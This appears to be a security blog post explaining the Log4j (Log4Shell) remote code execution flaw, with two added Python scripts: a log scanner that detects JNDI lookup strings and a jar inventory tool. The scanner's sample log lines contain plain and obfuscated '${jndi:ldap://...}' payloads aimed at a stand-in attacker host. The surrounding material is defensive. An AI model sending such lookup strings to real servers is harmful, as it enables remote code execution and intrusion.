If you work in cyber security or web development, you have likely heard of the Apache Log4j vulnerability. Many cyber security teams are still struggling to fix it, and malicious attackers can take great advantage of it. Log4j is a library that programmers use to log data from their applications.
What is Logging Data?
Logging data is equivalent to keeping a diary of the activities or actions performed in an application. This can be done for security reasons, such as recording the various authentications that have happened, which lets you spot malicious activity. It can also be done to keep a record of what happened in the application for debugging purposes.
Logging is very common and is used in many applications, particularly those written in the Java programming language. A large number of applications use Java, including Apache's own applications. Apache has also unveiled risk mitigations for Log4j, and many companies have implemented internal mitigations of their own.
Log4j
Log4j is essentially Apache software that developers use to log the different events that happen in Java-based applications. Since it is an Apache Software Foundation project, the software is open source, meaning it is free for developers to use. It is very commonly used in many organizations, and people rely on its ability to log different user activities and events.
Fundamentally, it is a logging library, and its popularity is due to the fact that logging can be configured and changed at runtime without touching the application binary. This means you have a very lightweight library that you can use for logging, and using it will not noticeably affect the speed or performance of your application.
Using Log4j also gives you plenty of control over what goes into the output of whatever log files your logs are written to. What you write into the Log4j library is what matters when it comes to cyber security risk: if Log4j sees a lookup expression in a log message that points to a remote address, it will try to download content from that address and execute it.
There are valid reasons for this kind of functionality. Your business website probably reaches out to other web addresses to pull in fonts, style sheets and other appearance assets. Even though that is very common, having such behaviour inside the logging mechanism of an application is questionable. Many people argue that this mechanism should have been disabled by default and should have had to be explicitly turned on.
Explaining the Exploit
Next, look at the actual vulnerability in Log4j and how hackers can take advantage of it. The exploit allows hackers and other malicious actors to perform remote code execution. In the cyber security realm, remote code execution is treated by professionals as a very high-risk, high-severity class of vulnerability.
Remote Code Execution
Remote code execution means that anyone in any part of the world, using any computer, can run code on a system that has this weakness. This also heightens the possibility of ransomware and other forms of malware causing disruption. Once an attacker has compromised credentials, they can reach data in other applications and exploit those too. This is why leaving this exploit unfixed is a very big risk for many organizations.
With remote code execution, an attacker can also take over your device, which means they can steal data as well as install different types of malware. This is very bad because attackers are exploiting the flaw while companies are still scrambling to fix it.
They are finding that they have remote access and remote code execution abilities in many different systems across many different tech companies. Many programmers rate this vulnerability at the highest level of severity based on how easy it is to use and what it allows. Today, you can likely find script kiddies looking for pre-packaged exploit code.
How Do Hackers Take Advantage of the Log4j Vulnerability?
Malicious hackers break into systems for many purposes. The first common exploits started with hackers breaking into Minecraft servers. Some also hacked into systems to use them for crypto mining, or to deploy malware that creates large-scale denial-of-service attacks. Hackers will also use this flaw to build their own botnets.
Ransomware by Log4j
Ransomware is one of the biggest scares of the Log4j vulnerability. Ransomware is an event in which a malicious actor enters a computer system and encrypts your valuable data. This means that you can no longer access your data unless you have the decryption key. The attacker then demands a ransom from you in exchange for the decryption key.
Most commonly, hackers will ask you to pay them in Bitcoin, a form of digital currency. Until you pay the fee, they keep all access to your valuable data frozen, which leaves you facing plenty of downtime costs. Paying usually does not remove the ransomware itself, so they could keep doing this every other month, leaving you with no choice but to pay again.
Most enterprises have valuable and critical data that they cannot afford to lose, which is why ransomware attackers often give their victims a deadline, usually within a few days or weeks. This sense of pressure and panic makes it very difficult to cope with a ransomware attack, especially if the attackers already have their software on your servers and machines.
The severity of this exploit is very high because of the prospect of remote code execution. It allows the attacker to install any software on the target machine and to run anything they would like. Beyond that, it lets them take over the machine, steal data, install malware and carry out many other harmful actions.
There are thousands of applications and websites on the internet that use Log4j for many different things. Whether it is for logging, debugging or other purposes, the list of applications that use it is very long. This means that this attack can impact companies around the globe.
Why You Should Care
The way Log4j is exploited is that anyone who can connect to a web server running Log4j in the background can send a request containing a lookup string that points at malicious code hosted somewhere else. The server passes that input into the Log4j mechanism, which then looks up the web address, downloads the code and executes it.
The Log4j vulnerability is already being weaponized, and malicious actors are actively trying to exploit the many websites people run. The worst case is that your system is compromised: they embed the malicious string in a web request to one of the systems your business runs that is reachable from the web.
That code can run a remote access Trojan, which lets the hacker take control of the compromised system. From there, they can move laterally through your business or do serious damage to it. Fixes for this problem include the patches that many vendors are releasing. It is also possible to change Log4j's settings to explicitly disable the lookup feature.
If you are currently uncertain whether your systems may be susceptible, it is important to patch affected products such as Ubiquiti UniFi controllers straight away, since a great many things are vulnerable to this. That is the serious reason there is a meltdown over this vulnerability.
How the Attack Works
You must understand in depth how hackers carry out this attack, especially if you are a developer. In Log4j, a certain non-default configuration lets attackers take advantage of applications or websites: when the logging configuration uses a certain pattern layout, attackers who control some of the input data can exploit it.
Either a Context Lookup or a Thread Context Map pattern is in use, and the attacker crafts malicious input that matches those patterns. The core issue is that Log4j allows lookups to appear in log messages, so whenever user input is logged, it can download serialized Java code from a server the attacker chooses.
That code is then activated when it is deserialized, which is what makes up the remote code execution attack. In terms of mitigation, Apache has released a new version of the Log4j library, which developers are advised to install.
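The two sections above describe the same chain: a lookup string arrives in a web request, gets logged, and Log4j resolves it. From the defender's side, the first thing a practitioner wants is a way to find such strings in the logs of the systems they run. The following detection script is an added example and is not code from the original post or from the Log4j project. It assumes nothing about Log4j's internals: it only scans text log lines, collapses the nested lookup wrappers that attackers use to hide the string (these are assumptions about attacker formatting, not documented behaviour of any product), and reports lines containing a JNDI lookup. The sample log lines and the host name in them are constructed for this example.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not captured from any real system).
# Line 2 carries a plain JNDI lookup, line 3 a nested/obfuscated form, and
# line 4 a harmless "${version}" placeholder that must not be flagged.
SAMPLE_LOG = """\
10.0.0.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://EXAMPLE-ATTACKER-HOST/a}"
10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /search?q=${${lower:j}ndi:${lower:l}dap://EXAMPLE-ATTACKER-HOST/b} HTTP/1.1" 404 "curl/7.79"
10.0.0.3 - - [10/Dec/2021:14:02:14 +0000] "GET /docs/${version} HTTP/1.1" 200 "Mozilla/5.0"
"""

# Wrapper forms that change how the string looks but not what Log4j would
# resolve it to. Each regex only matches an innermost ${...} (no nested braces),
# so repeated substitution peels the layers from the inside out.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${name:-default} -> default

# What we actually look for once the wrappers are gone.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookup wrappers so obfuscated forms reduce to the plain string."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break  # nothing left to unwrap
        text = new
    return text


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per log line that contains a JNDI lookup after normalization."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        normalized = normalize_lookups(line)
        if JNDI_PATTERN.search(normalized):
            hits.append({
                "line": lineno,
                "client": line.split(" ", 1)[0],   # first field of the access-log line
                "normalized": normalized,
                "obfuscated": normalized != line,   # True when wrappers had to be peeled
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['client']} "
              f"({'obfuscated' if hit['obfuscated'] else 'plain'}): {hit['normalized']}")
```

Run it against a real access or application log by replacing `SAMPLE_LOG` with the file contents; a hit tells you which client sent the string and whether it was disguised, which is the information an incident responder needs before deciding whether the request ever reached a vulnerable Log4j instance.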
Final Thoughts
Whether it is ransomware attackers, nation states, script kiddies or random people, all of them are learning about this exploit and trying to take advantage of it. This is one of the highest-severity threats you must pay attention to in your cyber security. To counter it, you may have to apply the latest patches and make whatever changes are needed in any application of yours that relies on Log4j.
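Applying patches starts with knowing where Log4j actually is, and the library is usually buried in a jar somewhere under an application's install directory rather than listed anywhere obvious. The inventory script below is an added example, not code from the original post or from the Apache project. It walks a directory tree, opens every jar, and for any log4j-core jar reports the version recorded in its Maven properties file together with whether the class that implements the JNDI lookup is still present. The two entry names are the real ones found in log4j-core jars; the jars the script builds to demonstrate itself are constructed here and carry obviously fake version strings, so compare the reported version against Apache's own advisory rather than against anything in this example.

```python
import os
import tempfile
import zipfile
from typing import Dict, List, Optional

# Real entry names inside log4j-core jars: the class that implements the JNDI
# lookup, and the Maven properties file that records the library's version.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"


def inspect_log4j_jar(path: str) -> Optional[Dict[str, object]]:
    """Return version and JndiLookup presence for a log4j-core jar, or None for other jars."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        if POM_PROPERTIES not in names and JNDI_LOOKUP_CLASS not in names:
            return None  # not recognisable as log4j-core
        version = None
        if POM_PROPERTIES in names:
            for raw in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                key, _, value = raw.partition("=")
                if key.strip() == "version":
                    version = value.strip()
        return {
            "path": path,
            "version": version,
            "jndi_lookup_present": JNDI_LOOKUP_CLASS in names,
        }


def scan_tree(root: str) -> List[Dict[str, object]]:
    """Inventory every log4j-core jar below root, sorted by path."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".jar"):
                result = inspect_log4j_jar(os.path.join(dirpath, name))
                if result is not None:
                    findings.append(result)
    return sorted(findings, key=lambda f: f["path"])


def build_constructed_jar(path: str, version: str, include_jndi: bool) -> None:
    """Write a minimal fake log4j-core jar for demonstration; class bodies are empty placeholders."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(POM_PROPERTIES,
                     f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"")
        if include_jndi:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")


def demo() -> List[Dict[str, object]]:
    """Build a constructed lib/ directory with three jars and inventory it."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    # Constructed: one jar still carrying the lookup class, one with it removed,
    # and one unrelated jar that the scanner must ignore.
    build_constructed_jar(os.path.join(lib, "app-core-OLD.jar"), "0.0.0-constructed-old", True)
    build_constructed_jar(os.path.join(lib, "app-core-FIXED.jar"), "0.0.0-constructed-fixed", False)
    with zipfile.ZipFile(os.path.join(lib, "unrelated.jar"), "w") as other:
        other.writestr("com/example/Main.class", b"")
    return scan_tree(root)


if __name__ == "__main__":
    for finding in demo():
        status = "JndiLookup present" if finding["jndi_lookup_present"] else "JndiLookup absent"
        print(f"{finding['path']}: version={finding['version']} ({status})")
```

Point `scan_tree` at an application's install root to get the same report for real jars. A finding with the lookup class present and a version older than the release in Apache's advisory is one to patch first; note that the script looks inside jars one level deep only, so applications that bundle log4j-core inside another jar or war file need the inner archive extracted before scanning.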